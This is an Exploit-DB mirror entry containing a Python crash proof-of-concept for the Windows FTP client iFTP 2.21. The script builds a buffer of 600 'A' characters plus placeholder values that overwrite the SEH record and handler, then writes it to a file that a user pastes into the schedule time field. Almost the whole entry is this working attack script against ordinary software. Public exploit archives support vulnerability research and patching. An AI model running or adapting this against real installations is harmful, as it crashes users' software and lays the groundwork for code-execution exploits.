exploit-db-mirror/exploits/windows/dos/36847.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

22 lines
No EOL
470 B
Python
Executable file

# iFTP 2.21 SEH overwritten Crash PoC
# Author: Avinash Kumar Thapa "-Acid"
# Date of Testing : 28th April'2015
# Vendor's home page: http://www.memecode.com/iftp.php
# Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Crash Point: Go to Schedule > Schedule download > {+} >Time field
buffer = "A"*600
buffer += "BBBB" # Pointer to Next SEH Record
buffer += "CCCC" # SEH HANDLER
file = "test.txt"
f = open(file, "w")
f.write(buffer)
f.close()